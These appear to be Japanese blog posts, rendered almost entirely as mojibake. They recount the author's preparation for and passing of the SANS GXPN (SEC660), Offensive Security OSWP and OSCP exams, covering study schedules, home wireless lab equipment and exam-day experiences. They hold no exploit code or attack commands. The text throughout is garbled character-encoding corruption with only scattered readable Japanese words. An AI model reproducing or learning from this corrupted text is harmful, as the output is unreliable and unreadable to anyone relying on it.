容ã§ã¯ããã®ã§é£ããæããé¨åãããã¾ããããã¨ã¯ã¹ããã¤ããæ¸ããã¨ã«é¢ãã¦è¨ãã°ãæ¦éã§ãããåããæãã¦ããã£ãã ãã¨ããã¨ããã§ãå®éã®ã¢ããªã±ã¼ã·ã§ã³ãªã©ã§ã¨ã¯ã¹ããã¤ããæ¢ãéã«ã¯å¯¾è±¡ã®ã¢ããªã®åä½ãããç解ããªããã°ãªããªãä¸ã«æ¨ä»ã®æ§ã
ãªã»ãã¥ãªãã£ä¿è·çã解決ããå¿
è¦ããããSEC660ã ãã§æºè¶³ãã¦ã¯ãªããªãã¨æãã¾ããï¼ãã¬ã¼ãã³ã°ã¨ãã¦ã¯ã¨ã¦ãç´ æ´ãããã§ãï¼ã
ä¸ä½ã®ãã¬ã¼ãã³ã°ã¨ãã¦SEC760ãããããã¡ãã¯ãã¼ããã«ã¼ãã«ã¨ã¯ã¹ããã¤ããªã©ãWindows11ã«ãé©å¿ã§ããã¨ã¯ã¹ããã¤ããæ¸ãã³ã¼ã¹ãããããã§ãã
SANSã®è©¦é¨ãï¼ååãã¦æã£ããã¨ï¼GIACå ¨è¬ï¼
ã«ãªãã¥ã©ã å 容ã«ãã£ã¦ã¯é£ããåé¡ããã¡ããããã¨ã¯æãã®ã§ããããã¯ãå ±éãã¦éè¦ãªã®ã¯ä»¥ä¸ã®é ç®ã ã¨æãã¾ãã
ã¤ã³ããã¯ã¹ãä½ããã¨
ã»ã¨ãã©ã¯ããã¹ãã®ä¸ããåºãããã¤ããã¹ãã®æã¡è¾¼ã¿ãå¯è½ï¼ãªã¼ãã³ããã¯ï¼ã¨èããã¨ãä½æãã¹ããã®ã§ããåã®GPENの記事ã§ãæ¸ãã¦ãã¾ããã試é¨ä¸ã«ããã¹ãããã£ããèªãã§ããæã¯ãªãã®ã§ãè±èªãè¦æãªæ¹ã¯å¯èªæ§ã害ããªãç¨åº¦ã«ãããã¹ãå ã®éè¦äºé ã赤ãã³ã§æ¥æ¬èªè¨³ãå¤ãã«æ¸ããã¨ãä¸ã¤ã®Tipsãã¨æãã¾ãã
模æ¬è©¦é¨ãåãã¦ã試é¨ç°å¢ã®ä½é¨ããã¦ãããã¨
è¨è¼ãã¦ããã¨ããã§ããã試é¨ã®UIã«æ £ãããã¨ããåºé¡ã®å¾åãèªã¿è§£ãã«ããã£ã¦ã¯å¿ é ã¨ãè¨ãã¾ãï¼ååGPENãåããæã¨è©¦é¨ã®ã¦ã¼ã¶ã¤ã³ã¿ãã§ã¼ã¹ãå¤ãã£ã¦ãã¾ããï¼ã
è±èªãå¾æã ã¨å¥ªãããæéãå°ãªãã¦æ¸ã
æ¯å½èªãè±èªã§ã¯ãªãæ¹ã®ç¹æã®åé¡ã ã¨æãã¾ãããç§èªèº«ãè±èªã®æèãåãããªãã¦è§£ããªãã£ãã§ãããåé¡ãä½åãçµé¨ãã¦ãã¾ããOffensive Security社ã®å種試é¨ãªã©ã®ä¿®è¡ãçµããããã§è±èªã«å¤å°æ £ãã¾ãããæ°ãä»ãã°ä»åã¯è¾æ¸ãå¼ããã¨ãç¡ãã£ãã®ã§ãããååã®GPENã®æã¯ï¼åãããè¾æ¸ã§åèªãæ¢ãã¦ãã¾ãããé·æã ã¨ããã ãã§ãæéããããã¾ãããï¼åã ãã§ãè¾æ¸ãåç §ããæéã¨ãã¦30ç§ï½ï¼åã奪ãããã¨ãªãã¨ãã§ããéãè±èªã«æ £ãã¦ãããã¨ã¯è©¦é¨ãæå©ã«ãããã®ã¨è¨ãã¾ãã
試é¨è¨ç»ãæ©ã ã«ç«ã¦ã
ããã¯ãããã®è©¦é¨ã«ãè¨ãããã¨ã§ãããSANSã®è©¦é¨ã¯æ¦ã4ãµæ以å
ã«åé¨ãããã¨ãå¿
è¦ã§ãã
SANSã®è©¦é¨ã§ã¯ã¹ã©ã¤ããã¼ããå«ãã¦ããã¹ããèªç ´ãããã¨ãæãéè¦ã§ãã©ã®ãããã®æéã§èªäºãããã¨ããè¦ç©ããç«ããªããã¨ãããã¾ããé²æã¯æ¥ã
ã®ä»äºã®é½åãè±èªã®ã¹ãã«ã«ä¾åããé¨åãããã®ã§ãè¬ç¾©çµäºå¾ã¯æ©ã
ã«ããã¹ããèªã¿ãï¼æ¥ã«èªã¿é²ãããããã¼ã¸æ°ãææ¡ãã¤ã¤ã模æ¬è©¦é¨ã試é¨æ¬çªã®æ¥ç¨ãå®ãããã¨ãããã¨èãã¾ãã
é¸æè¢ã«æ©ãã éã¯ãééã£ã¦ããçç±ãæ¢ã
ãããå½ããåã ãã¨è¨ããããã§ãããééãã®çç±ãç¥ããã¨ã¯å¦ã³ãå¤ãæ触ã§ããé¸ãã 解çãæ£è§£ã§ãããã¨ã®ç¢ºä¿¡ãæã¦ã¾ãã®ã§ãå³åº§ã«è§£çãåãã£ãæããæéã«ä½è£ãããã°èª¤çã®çç±ã®åæãã§ããã¨è¯ããã¨æãã¾ãã
ããããSEC660ãåè¬ãããï¼æ¤è¨ãã¦ããï¼æ¹ã¸
åé ã§ã説æãã¦ãã¾ããããããã¯ã¼ã¯ãããã¬ã¼ã·ã§ã³ãã¹ãã®åºç¤ã«ã¤ãã¦ã¯æ¯ãè¿ã£ã¦èª¬æããã¨ãã£ããã¨ã¯ããã¾ãããã¾ããã¢ã»ã³ããªãè¦æã¨ããå ´åãè¬ç¾©ã®å¾åã¯ã»ã¼ã¢ããªã±ã¼ã·ã§ã³ã®ã¨ã¯ã¹ããã¤ãã¨ãªããé²ã¿ãæ©ãæãããã¦è¦å´ããããããã¾ããã®ã§ã以ä¸ã®å 容ãäºåã«å¦ç¿ããäºããå§ããã¾ãã
- SEC560ç¸å½ã®ãããã¯ã¼ã¯ãããã¬ã¼ã·ã§ã³ãã¹ãã«é¢ããç¥è
- ãªãã¼ã¹ã¨ã³ã¸ãã¢ãªã³ã°ã«é¢ããç¥è
æ¯ãè¿ãã°ã趣å³ã®ã¬ãã«ã§HTBãCTFã§Pwnableãªåé¡ã解ãã¦ãããã¨ãããªãå½¹ç«ã¡ã¾ããããã®ããæ¹ã§ã¯ææµãã¤Linuxã«åã£ã解æ³ã§ããããSANSã§ã¯Windowsã®ã¨ã¯ã¹ããã¤ããå«ãã¦æ
å ±ãä½ç³»çã«æ´çãã¦æãã¦ãããã®ã§ãå¦ç¿ãã¦ããã£ãã§ãã
ã¾ããåè¿°ã®SEC760ã¨ã©ã¡ããåããã¹ãããã¨ãããã¨ã«è¿·ãå ´åã¯ç¥èãåãã¯ã¤ãºãããã¾ãã®ã§ã確èªãã¦ã¿ã¦ã¯ãããã§ããããã
www.sans.org
GXPNã®å 人ã®ä½é¨è¨
ä¸å®è§£æ¶ã®ããã«ã¸ã£ã¼ãã¼ãã¡ãã¡ãè¦ã¦ã¾ããã
medium.com
javan.de
blog.geoda-security.com
medium.com
çµããã«
- ãPatch Tuesday, Exploit Wednesdayãã¨ããåè¨ãç¿å¾ãã¾ããã
- ä»å¹´ã¯ã²ã¨ã¾ããã£ãããããã¨æãã¾ãããHoliday Hack Challengeã¯ãããããã¾ãæ¥å¹´ã¯ä½ãããã¼ã¡ã¼ã¡èãã¾ãï¼ä¸ã¯é ãé¤ãã¦ããã¾ã§ã®SANSé¢é£ã®æ¦å©åã§ãï¼ã
OSWPãåå¾ï¼ä»åã®Learn Oneã§ã®åé¨å¯è½è³æ ¼ãã³ã³ããã¾ãã
OSWPã«åæ ¼ããã®ã§ããã¡ããããã¾ãè¨äºãè¦å½ãããªããããã¬ãã¸å
±æã§ãã
ã¬ãã¼ãæåºãã¦ããã»ã¼ä¸¸ä¸æ¥ã§åæ ¼éç¥ãæ¥ã¾ãããç¥ããªãã£ãã®ã§ãããOSWPã«åæ ¼ããã¨ãISC2ã®CPEã10ãã¤ã³ãã§ç³è«ã§ããã¿ããã§ãã
ããã§OSCP/OSWP/KLCPãã²ããããã®ã§ãä»åç³ãè¾¼ãã Learn Oneã®åé¨ã³ã³ãã³ããä¸éãçµãã¾ããã
OSWPã¨ã¯
- Offensive Security社ã®ã¯ã¤ã¤ã¬ã¹ãããã¯ã¼ã¯ã«å¯¾ããæ»æã®ã¹ãã«ããããã¨ã証æããè³æ ¼ã§ãシラバスã«ãããã¨ãããWi-Fiãããã¯ã¼ã¯ã«å¯¾ããæ»æã¹ãã«ãç¿å¾ã§ãããã®ã§ããBluetoothããã®ä»ã®ã¯ã¤ã¤ã¬ã¹ãããã¯ã¼ã¯ã«å¯¾ãããã®ã¯å«ã¾ãã¾ãããOSCPãªã©ã¨ç°ãªããã©ããèªåã§ä½ããã¨ãè¦æ±ããã¾ãã
- å·çæç¹ã®Exam Guideã§ã¯ãï¼æéï¼ï¼åã§ï¼ã¤ã®ã¯ã¤ã¤ã¬ã¹ãããã¯ã¼ã¯ãæ»ç¥ãããã¡ï¼ã¤ã®proof.txtãåå¾ããï¼ï¼æé以å ã«ã¬ãã¼ããæåºããã°æ´ãã¦åæ ¼ãããã§ãããªãï¼ã¤ã®ãã¡ï¼ã¤ã¯æ»ç¥ãå¿ é ã«ãªã£ã¦ãã¾ãã
- 公式のFAQã«ããã°ã2022å¹´2æ14æ¥ä»¥éã¯æ°è©¦é¨ã«ãªã£ã¦ããããã§ããä¸èº«ãã©ãå¤ãã£ããã¾ã§ã¯è¦ã¦ãã¾ããããéå»ã®ä½é¨è¨ãè¦ãéãã§ã¯ãWEPãããªãèããªããWPA-PSKã¨WPA-Enterpriseã«ãã©ã¼ã«ã¹ããããã®ã¨æ¨æ¸¬ãã¾ãã
- æè²ã³ã³ãã³ãã«ã¯ãã£ããã£ããã¼ã¿ã«ãWPSã«å¯¾ããæ»æããBettercapãKismetã®ä½¿ãæ¹ãªã©ãããã¾ãã
ãªãOSWPãåå¾ãããã¨ããã
Learn Oneã®ãå¸æ½åãååãããã£ã- Wirelessã«é¢ããç¥èãä¹ããã£ãã®ã§ãã®è£ã¦ã
- ããããã¼ã¸ã£ã¼è·ã¨ãã¦å¹ ãåºãããã£ã
ç§ã®ããã¯ã°ã©ã¦ã³ã
- æ¬æ¥ã¯éç¨ãããªãããã¼ã¸ã£ã¼è·ãåéãè¦ã¤ãã¦è¶£å³ã§æãåããï¼ã³ãã³ããæã¤ï¼ã¬ãã«
- OSCP/CISSP/CISA/GPEN/KLCP
- LPIC-2âæ°å¹´åã«å¤±å¹
- è±èªã¯å¥½ãã ãå¾æã§ã¯ãªããæµ·å¤ã®æ å ±ãgoogle翻訳ã¨å¯¾æ¯ãããªãããã£ããèªãç¨åº¦
- SOC/CSIRTæ¥åãæ°å¹´ç¨åº¦çµé¨ãã¦ãã
- 趣å³ã§CTFï¼æè¿ã¯offsecåé¨ç¥ãã§ãµãã£ã¦ãï¼
- ã¯ã©ã¦ãã¾ããã®çµé¨å¤ã¯ä½ã
- 診æï¼ãã³ãã¹ãï¼ã®ãä»äºçµé¨ã¯å®è³ªï¼å¹´ç®
æºåããããã®ã
- QNAP TS-453Bï¼ä½ã£ã¦ãã®ã§Radiusãµã¼ãã¨ãã¦ï¼
- Buffalo WAPS-1266ï¼ã¢ã¯ã»ã¹ãã¤ã³ãã¨ãã¦ãæ³äººåããWEPããWPA3-Enterpriseã¾ã§ãããï¼
- Buffalo WLI-UC-G300HPï¼ç¸å½æã«è³¼å ¥ãã¦ããã¢ãã¿ã¼ã¢ã¼ãå¯è½ãªã¯ã¤ã¤ã¬ã¹ã¢ããã¿ï¼
- é©å½ãªã¹ãã
æºåããããã¨ã
- æç§æ¸ã®èªã¿è¾¼ã¿ï¼æ¼ç¿ï¼ãã¼ãã·ã¼ãä½æï¼ç´ï¼é±éï¼
- æç§æ¸ã®ï¼åç®èªã¿è¾¼ã¿ï¼æ¼ç¿ï¼åºç¤ç¥èã®ç©´åãï¼ç´ï¼é±éï¼
- ä»ã®ãã¨ã«ãã¤ã¤ãæããï¼ç´ï¼é±éï¼
å¾è¿°ãã¾ããã試é¨ã¾ã§ã®æ¥ä»ã空ãã¦ãã¾ã£ãã®ã§ãï¼åç®ã¯éä¸åãåãã¦ä»ã®ãã¨ããã£ã¦ãæéãå¤ãã§ããå¾åã§åºç¤ç¥èã®ç©´åãã¨ãã¦ãã¾ããããããã¯ã¼ã¯å±ããã§ã¯ãªãã®ã§ãã®è¾ºã®ç¥èãä¹ãããEAPã¯å··ã§ã¯éå¢ã¨å¼ã°ãã¦ããããã§ãä»ã§ãããããããããªãã¨æããã¨ãå¤ã ããã»ã»ã»ã
æºåã§å°ã ã¤ã¾ã¥ããã¨ãã
ã¢ãã¿ã¼ã¢ã¼ããå¯è½ãªã¢ããã¿ãããã«æ¢ãã
ããã¯OSWPåé¨æºåã«ãããæ大ã®ãã¤ã³ãã ã¨æã£ã¦ãããåè¿°ã®ã¨ããã©ãç°å¢ã¯èªåã§ç¨æããªããã°ãªãã¾ãããPEN-210ã®æ¨å¥¨ã¢ããã¿ã¯é»æ³¢æ³ä»¤ã§å®ãã¦ããæè¡åºæºã«é©åãã¦ããç¡ç·æ©ã§ã¯ãªãããããããæé©ãã¼ã¯ãããã®ãã®ãæ¢ãã®ãå¤å°é¢åã§ãã
ä¸è¨ãµã¤ãã§ã¯ã¢ãã¿ã¼ã¢ã¼ãããµãã¼ããã¦ããã¢ããã¿ãç´¹ä»ãã¦ãã¾ããæ¥æ¬ã®ãã³ããããããªããå«ã¾ãã¦ãã¾ãã
deviwiki.com
â»å°æ¥æ§ã®è¦³ç¹ãããæé©ããï¼802.11ax対å¿ã®ã¢ããã¿ãã§ããã°èª¿éããããªã¼ã¨æã£ãã®ã§ãããIntelã®AX200ãããããã¢ãã¿ã¼ã¢ã¼ãã«å¯¾å¿ãã¦ããªãã¿ããã§ããã¤ã³ã¿ã¼ãã§ã¼ã¹ãM.2ã§ãããã¡ãã£ã¨é£ãããã
802.11ax USB adapter | SmallNetBuilder Forums
Intel WiFi 6 AX200 WiFi Card with Kali
ã©ãã§ä½¿ãAPã¯WPA-PSK/WPA-Enterprise対å¿ã®ãã®ãé¸ã¶ï¼WEPãããã¨ãªãããï¼
ã¾ãã¾ã§ãããã·ã©ãã¹ã«å ¨é¨å«ã¾ãã¦ããã®ã§ãã¡ããã¨æºåãã¾ããããWEP対å¿ã®ãã¤ãå°ãªãã¦å°ã é¢åã§ããã
試é¨ã®ç³ãè¾¼ã¿ãï¼é±éå 以éããæå®ã§ããªãã£ã
æéãç¡ããªã£ã¦è¿½ãè¾¼ã¾ããã¨ããã±ã¼ã¹ãé¿ãããã£ãã®ã§ãæç§æ¸ãä¸å¨ãã¦ãã試é¨ã®ç³ãè¾¼ã¿ãããã®ã§ãããï¼é±éãæéã空ãã¦ãã¾ãã飽ãã¦ãã¾ã£ãé¨åãå¦ãã¾ããï¼ç§ã ãã®ç¶æ³ããããã¾ãããï¼ã
試é¨å½æ¥
æï¼æããã®è©¦é¨ã ã£ãã®ã§ãOSCPã®æã¨åãããã«ï¼æï¼ï¼åãããããã¼ã¡ã¼ã¡Proctoring Softwareã«ãã°ã¤ã³ãã¦ãIDã表示ãã¦ãé¨å±ã®å¨å²ãæ ãã¦ãã¦è©¦é¨éå§ã¨ãã£ãã¨ããã§ãããOSCPã®æã«ã¯èãããªãã£ããããªç¢ºèªäºé ãã¢ã¯ã·ã§ã³ããã£ã¦éå§ã§ããã®ã¯ï¼æåã試é¨çµäºæéã¯å¤ãããªãã®ã§ãã¾ããã®ããã§Try Harderãï½ã
- ããã¦ï¼ã¤ç®ã®å¿ é APã®æ»ç¥ã§OSCPåæ§ã«ãã¯ã¾ããã¦ï¼æéã溶ãããã®ã§ä¼æ©ãã¦è³å ãªã»ãããï¼åãã§ããªãæã¯ãã¯ãç¦ãã¾ãã
- ï¼ã¤ç®ã®APãå ã«ãã£ã¦ãï¼ã¤ç®ã«ãã©ã£ããééãã«ããæ°ã¥ããproofããã£ã¨ã
- ï¼ã¤ç®ã¯ç¥ããªãã£ããã©googleå çãæãã¦ããã¾ããã
- ã ãããï¼ï¼ï¼æéã§å ¨é¨proof.txtãåå¾ããã®ã§ãæ®ãï¼æéç¨åº¦ã§åç¾æ§ãã§ãã¯ããã£ã¦è©¦é¨çµäºã
- ã¬ãã¼ãã¯æ éã«è¦ç´ãã¦ï¼æéãï¼ï¼ãã¼ã¸ç¨åº¦ã§æåºãã¾ããã
- 試é¨æã®ã¡ã¢ï¼ã¹ã¯ã·ã§åããOnenoteã«ãã¦ãããçµäºå¾ã«Wordã§ã¾ã¨ãã¾ããã
試é¨å¾ã®ææ³
- 試é¨ã®ä¸èº«ã¯ãä¼ãåºæ¥ãªãã®ã§ãããOSCPã«æ¯ã¹ã¦æ©ãè¦ç´ ãå°ãªãã®ã§ãæç§æ¸ã®ã¨ãããã£ãããããã¨ã大äºã§ããããã«ã³ãã³ããæã¦ãããããã¼ãã·ã¼ãã¯ãã£ããä½ãã¾ããããã¾ããæ©ãã ãããgoogleå çã«èãã¾ãããã
- Kaliã®ã³ãã³ãã©ã¤ã³ã¤ã³ã¿ã¼ãã§ã¼ã¹ã§ãããããããã¨ãè¦æã§ãªããã°åé¡ãªãã¬ãã«ã§ãã
- å·çæç¹ã§ã¯WPA3ã®æ»ç¥ã¯å³ããæ å¢ã§ãããã¨ãè¸ã¾ããã¨ãOSWPãåå¾ããããã¨ãã£ã¦ãææ°ã¢ã«ã´ãªãºã ã®æ»æã«å¯¾å¿ã§ããã¨èããªãæ¹ãè¯ãã§ãããã ãèå¼±ãªè¨å®ã«å¯¾ããæ»ææ¹æ³ã¨ãã¦ã¯æç¨ãªã®ã§ãLearn Oneã®å¥ç´ãããããããã¦ãã¦ãæéããããä½è£ããããã¯ã¤ã¤ã¬ã¹ã®ãã¹ãã«èå³ãããæ¹ã¯ï¼ã¤ã®é¸æè¢ã¨ãªãã®ã§ã¯ãªãã§ããããã
Learn Oneåé¨ã³ã³ãã³ããçµãã¦
- èªåã®ããããã³ã¼ã¹ãé¤ãããµãã³ã³ãã³ãçãªPG PracticeãPEN-103ãä»ã®Level100ã®åºç¤ã³ã³ãã³ããPEN-210ãæç¨ã§ãããå¦ãã¯åè¬ãããæ¹ã®ããã¯ã°ã©ã¦ã³ã次第ããªã¨æãã¾ããç®çãã¯ã£ãããã¦ããæ¹ã¯åä¸ã³ã³ãã³ãã®90æ¥ãã©ã³ãé¸ãã æ¹ãè²»ç¨å¯¾å¹æã«åªãã¦ããæ°ããã¾ãï¼ä¸»è¦³ï¼ã
- ï¼1000ãã«ãé«ãã¨æããã©ããã®è¦³ç¹ã«ãªãã¾ãããLearn Oneã ã¨ãµãã¹ã¯æéã365æ¥ã¨å¤§å¹ ã«å¢ããLevel100ã³ã³ãã³ãï¼å¸æã³ã¼ã¹ã®è©¦é¨ï¼åï¼PEN-210ï¼PG Practiceã¨ããç¹å ¸ãã¤ãã¾ãã®ã§ãåé¨ããã®æºåã«å¯¾ãã¦å®å¿æã¯å¤å°å¾ãããããããã¾ããã
- ç§ã¯PEN-103/PEN-210ã®ããããä¸æ £ããªé åã ã£ãã®ã§ãå¹ ãåºããã¨ãã観ç¹ã§Learn Oneãé¸ãã ã®ã§ãããä¾ãã°Kali Linuxã®æä½ã«æ £ãã¦ãããã¾ãã¯Wi-Fiã®ãã³ãã¹ããªãã楽åã ãã¨æãæ¹ã¯KLCP/OSWPã®åå¾ã¯ä¸è¦ããããã¾ãããOSCPãã´ã¼ã«ã«è¨å®ããå ´åããããªãã¦ãè¯ãã³ã³ãã³ãã§ãï¼ãã ããKLCPã¯è¥å¹²ã§ããOSCPã©ããããã§ã®ãã©ãã«ã·ã¥ã¼ãã£ã³ã°ã®è£å©ã«ã¯ãªãã¾ããï¼ã
- æççã«å¹
åºãããã£ã¦ããç§ã¨ãã¦ã¯ãLearn Oneã¯Level100ã®ã³ã³ãã³ããå«ãã
ãå¸æ½åãååã«ååã§ããç´ æ´ãããã³ã³ãã³ãã ã¨æãã¾ããã
ä»ã®Level100ãPG Practiceã¯ã¾ã æéãæ®ã£ã¦ããã®ã§ãé©å®è§¦ããã¨æãã¾ãã
次ã¯èªåã§exploitæ¸ããããã«ãªããããªãã¨æãä»æ¥ãã®é ã
OSCPã«åæ ¼ãã¾ãã
ããããé·ãæ
è·¯ãçµãããèªå®ããã¾ããã®ã§å¤å°ã®ãã¬ãã¸å
±æã§ããã¬ãã¼ãæåºå¾ã»ã¼ï¼æ¥ã§åæ ¼éç¥ãæ¥ã¾ããï¼ç¸å ´è¦³ã¨ãã¦ï¼æ¥ããããªã®ã§ãã¾ãã®åéçã«ç¦ãã¾ããï¼ã
åæ ¼ä½é¨è¨ã«ã¤ãã¦ã¯ä»ã®äººã大éã«æ¸ãã¦ããã¨èªèãã¦ãã¾ãã®ã§ãå¯è½ãªéãå·®ç°ã¨ãªããããªé¨åã«ã¤ãã¦æ¸ãã¾ãã
OSCPã«ã¤ãã¦ã¯ãåé¨ãããæ¹ãã»ãã¥ãªãã£æªçµé¨ã®æ¹ã ã£ãããçç·´ã®æ¹ã ã£ããã¨ã¹ãã«ã»ããã¯æ§ã
ã®ããã§ããç§ã¯æªçµé¨ã§ã¯ãªãã®ã§ãããçç·´ã¨å¼ã¹ãã»ã©ã§ããªãã®ã§ããã®ãããªç«å ´ã§ã©ã®ãããªãã¨ããã£ã¦ããã®ãã«ã¤ãã¦å
±æãããã¨æãã¾ãã
- ãªãOSCPãç®æããã¨ããã
- å¥ç´ãããã©ã³
- ç§ã®ããã¯ã°ã©ã¦ã³ã
- åé¨ã«ãããæºåãããã¨
- 試é¨ã®äºç´
- 試é¨ç´å
- 試é¨å½æ¥
- ãã®ä»
- ã¾ã¨ã
ãªãOSCPãç®æããã¨ããã
- ç¾è·ããã¼ã¸ã£ç¸å½ã ããããã¼ã¸ã£è·¯ç·ã«é²ã¾ãªãããã®å¸ç³ãæã¤
- è·å ´ã§ãã¤ãããï¼ããã¼ããªï¼
- ç¥ç好å¥å¿ï¼ãï¼ããããï¼ãã§ä¼ããã¾ãã§ããããï¼
macbookç¸å½ã®èªè²»åºè²»ã®åãè¿ã
å¥ç´ãããã©ã³
ç´°é¨ã¯Offensive Security社のウェブサイトã«æ¸ãã¦ãããæ§ã
ãªä½é¨è¨ãã¿ãã¨90æ¥ãã©ã³ã§å¥ç´ãããæ¹ãå¤ãããã§ãããç§ã¯å¹´éãµãã¹ã¯ã®Learn Oneãå©ç¨ãã¾ããã
é¸ãã çç±ã®ä¸»ãªãã¤ã³ãã¯ä»¥ä¸ã®éãã§ãã
- æ¨å¹´æ«ã«å¹´éãµãã¹ã¯ã$1,999ã§è³¼èªã§ããã
- åºç¤å 容ã®åããã¼ããããããªãï¼ADã«ä¸å®ããã£ãã®ã§ãPEN-100ã®ã³ã³ãã³ãã§æºåãã¦ããããã£ãã
â»ä»¥åã¯PEN-100ã®ã³ã³ãã³ãå
容ãè¨è¼ããã¦ããã®ã§ãããè¦ãéãã§ã¯å
¬å¼ããã¯çç¥ããã¦ãã¾ã£ãããã§ããå人ã§Learn Oneã®å¦ç¿å±¥æ´ãæ¸ãã¦ããããæ¹ã®è¨äºã«ããã®æçãå£éè¦ããã®ã§åèã«ãªãã¾ãã
blog.invid.eu
PEN-100ã®å¦ç¿ã¯OSCPã«å¿
é ãï¼ã¨ããç¹ã«çããã¨ãããªãã°ããç§ã®å ´åã¯ããã§ããªããã¨ããæãã§ããã³ã³ãã³ãå
容çã«ã¯åºç¤ã§ãããå
¨é¨ãç¥ã£ã¦ããããã§ã¯ãªãã£ãã§ãããããã¯ã°ã©ã¦ã³ãçµé¨ã§å¤§ä½ç¥ã£ã¦ãã¾ããããã©ã¡ããã¨ããã¨ããããï¼è±èªã®è¨äºãèªã¿æ
£ããã¨ãã£ãå ´ã«ãªãã¾ããã
ç§ã®ããã¯ã°ã©ã¦ã³ã
OSCPã¸ã®ä¸å®è¦ç´ ã¨ãã¦ããã¯ã°ã©ã¦ã³ããã©ã®ç¨åº¦ãã¨ãã観ç¹ãããã¨æãã®ã§ãæ¹ãã¦è¨è¿°ãã¾ãã
- æ¬æ¥ã¯éç¨ãããªãããã¼ã¸ã£ã¼è·ãåéãè¦ã¤ãã¦è¶£å³ã§æãåããï¼ã³ãã³ããæã¤ï¼ã¬ãã«
- CISSP/CISA/GPEN/KLCP
- LPIC-2âæ°å¹´åã«å¤±å¹
- è±èªã¯å¥½ãã ãå¾æã§ã¯ãªããæµ·å¤ã®æ å ±ãgoogle翻訳ã¨å¯¾æ¯ãããªãããã£ããèªãç¨åº¦
- SOC/CSIRTæ¥åãæ°å¹´ç¨åº¦çµé¨ãã¦ãã
- 趣å³ã§CTFï¼GDBãåããã¦ããï¼
- ã¯ã©ã¦ãã¾ããã®çµé¨å¤ã¯ä½ã
- 診æï¼ãã³ãã¹ãï¼ã®ãä»äºçµé¨ã¯å®è³ªï¼å¹´ç®
ä»åã¯ãã¡ããã§ããGPENãç¸å½å½¹ã«ç«ã¡ã¾ããããªããªããOSCPã§ã¯ç´°ããç´¹ä»ãã¦ãããªããç°¡åã«ä½æ¥ããTipsãå¤ã
å©ç¨ã§ãããã¨ã§ãã
åé¨ã«ãããæºåãããã¨
ç§ã¯ä»ã®æ¹ã®ããã«ã»ã³ã¹ãããã¨èªè² ãã¦ããªãã®ã§ãå°éã«ã³ã³ãã³ããé²ããä½æ¦ãé¸ã³ã¾ããã
ï¼æ¨å¹´ï¼
- tryhackmeã®Jr Penetration Testerï¼ã ãããï¼ãæ課éï¼
- Hack the Boxï¼34ãã·ã³ï¼Fortressesã®ä¸é¨ãchallengesã®Pwnã9åã»ã©ï¼ï¼ï½ï¼ãæãVIPå¥ç´ï¼
ï¼ä»å¹´ï¼
- PEN-103(KLCP)ãç´ï¼ãæ
- PEN-100ã®ã³ã³ãã³ãå ¨èªï¼ãããã¯ã¨ã¯ãµãµã¤ãºãã³ã³ããªã¼ããç´ï¼ãæ
- PEN-200ã®PDFå ¨èªï¼ãããã¯ã¨ã¯ãµãµã¤ãºï¼ã¬ãã¼ããã³ã³ããªã¼ããç´ï¼ãæå¼·
- ã©ãï¼ã©ãã¬ãã¼ãã®ã³ã³ããªã¼ãï¼75ãã·ã³ï¼ãç´ï¼ãæå¼·
ï¼æ¥ã®å¹³åã¨ãã¦ããããï¼ï½ï¼æé以ä¸ã¯ããã«è²»ããã¦ããã¨ããå®ç¸¾ã«åºã¥ããã®ã§ããååã«æéãåããããã¤OSCPã ãã«ããèå³ãç¡ãæ¹ã¯ï¼ï¼æ¥ãã©ã³ã§è¯ããã¨æãã¾ãããå¹
åºããã¤ãã£ããããããããããã¯æéã®åããªãæ¹ã¯Learn Oneã®æ¹ãå®å¿ã§ããã¨æãã¾ãã
ãªãããã©ã¼ã©ã ãdiscordã使ãã°ã©ãã®ã³ã³ããªã¼ãã¯å¯è½ã§ãããããªã®ç¥ããããªãã¨æããã¨ããã£ãã®ã§ãããæçµçã«ã¯çãã«ãã©ãçãã¨æãã¾ããç¹ã«è³ªåçããã¾ããã§ããã
- TJnullãªã¹ãã«ããPG Practiceã®Windowsãã·ã³ãä¸å¿ã«18ãã·ã³ï¼ç´ï¼é±éï¼
docs.google.com
www.offensive-security.com
ã¶ã£ã¡ãããã®æã¯ããã®ãã·ã³ã¯å ¨ã¦Writeupãè¦ãã«ãã£ãããã§ããªãã試é¨ã§ã¯èª°ã®åãåãããªãã¨ãããã¨ãèããã¨ä¸å®ãåã£ã¦ããã¾ããï½
- ã©ãPDFã¨ã©ããã·ã³ã®ããããï¼ç´ï¼é±éï¼
å®ã¯ãã®ããããããããã£ã¦ããã£ãã¨æãã¦ãã¾ããã©ãã¯å
±æãã·ã³ã§ããããã£ã¬ã³ã¸ãã¦ããéã«ä»è
ã«ãã£ã¦ç¶æ
ãå¤æ´ããã¦ãã¦ãæ°åãã·ã³ã¯æ³å®è§£ã¨ç°ãªã£ãæ»ç¥ãã¯ã¿ã使ã£ã¦ããã±ã¼ã¹ã«æ°ã¥ãã¾ãããrevertã¯å®éã®ç°å¢ã«ããã¦ãã¤ãã¤ã¨ã§ãããã®ã§ã¯ãªãã®ã§ãããç©æ¥µçã«å®æ½ãããã¨ããå§ããã¾ãã
試é¨ã®äºç´
ã©ããã³ã³ããªã¼ããã¦ãããæéãçµã¤ã¨å¿ãããã¨ããä¸å®ã«ããããã§ããã ãæ©ãåãããæ°æã¡ã«ãªãã¾ããããã®ãããåé¨å¯è½ãªæ¥ã®æ¼12æãã¬ã¤ãã¼ã«ã®ç¿æ¥11æ45åã²ã¼ã ã»ãããé¸å®ãã¾ããããã®æé帯ãé¸å®ããçç±ã¨ãã¦ãæ¥ä»ãåªå ãã¦é¸ãã ã®ã§ã¾ã¨ããªæé帯ããããããªãã£ãã®ã§ãï¼ç¬ï¼
試é¨ç´å
ï¼ï½ï¼æ¥åã«ãªãã¨ãã©ããã³ã³ããªã¼ããããã¨ãå¦ç¿ã«æéãã ãã¶æº¶ããããã¨ãããæ°åå
¥ãã¦åå¼·ããã¨ããä¸å¤æ¼¬ãã®æ°æã¡ã¯ä¸åãªããããã£ã¨ããæ°æã¡ãå¢å¹
ããã®ã§ãYoutubeãè¦ã¦ãã¼ã£ã¨éããã¾ããã
ç§ã¯ãã«ã¼ãã£ã¼ã³ãã大äºã«ãã¦ããã試é¨åæ¥ã«ã¯KLCPã®æãããã£ã¦ããã¨ããã¤ãé£ã¹ãé
ã¯æ¬ ããã飲ã¿ã¾ããããã¡ãããæ©ãå¯ã¾ããã
試é¨å½æ¥
